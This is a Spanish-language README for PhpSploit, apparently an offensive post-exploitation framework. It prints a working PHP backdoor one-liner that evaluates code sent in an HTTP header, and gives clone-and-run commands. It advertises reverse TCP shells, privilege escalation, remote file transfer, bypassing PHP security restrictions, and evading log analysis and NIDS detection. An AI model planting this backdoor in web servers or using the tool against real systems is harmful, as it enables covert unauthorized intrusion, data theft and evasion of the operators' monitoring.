codeclimate maintainability
Resumen
La comunicación ofuscada se logra utilizando cabeceras HTTP en
peticiones estándar del cliente y respuestas relativas del servidor web,
tunelizada a través de una pequeña puerta trasera polimórfica:
<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>
Inicio rápido
git clone https://github.com/nil0x42/phpsploit
cd phpsploit/
pip3 install -r requirements.txt
./phpsploit --interactive --eval "help help"
Características
-
Eficiente: Más de 20 plugins para automatizar tareas de escalada de privilegios
- Ejecuta comandos y navega por el sistema de archivos, evitando restricciones de seguridad de PHP
- Subir/Descargar archivos entre el cliente y el objetivo
- Editar archivos remotos a través de un editor de texto local
- Ejecutar consola SQL en el sistema objetivo
- Generar shells TCP reversos
-
Sigilo: El framework está hecho por paranoicos, para paranoicos
- Casi invisible para el análisis de logs y la detección por firmas NIDS
- Modo seguro y omisión de restricciones de seguridad PHP comunes
- Las comunicaciones están ocultas en cabeceras HTTP
- Las cargas útiles se ofuscan para evitar NIDS
- Soporte de proxy http/https/socks4/socks5
-
Conveniente: Una interfaz robusta con muchas características cruciales
- Ayuda detallada para cualquier opción (comando
help)
- Multiplataforma tanto en el cliente como en el servidor.
- La CLI soporta autocompletado y multi-comando
- Función de guardar/cargar sesión e historial persistente
- Soporte de multi-petición para cargas útiles grandes (como subidas)
- Proporciona un potente motor de configuración altamente personalizable
- Cada ajuste, como user-agent, tiene un modo polimórfico
- Variables de entorno personalizables para la interacción con plugins
- Proporciona una API completa para desarrollo de plugins
- GNU/Linux
- BSD-like
- Mac OS X
- Windows NT
Colaboradores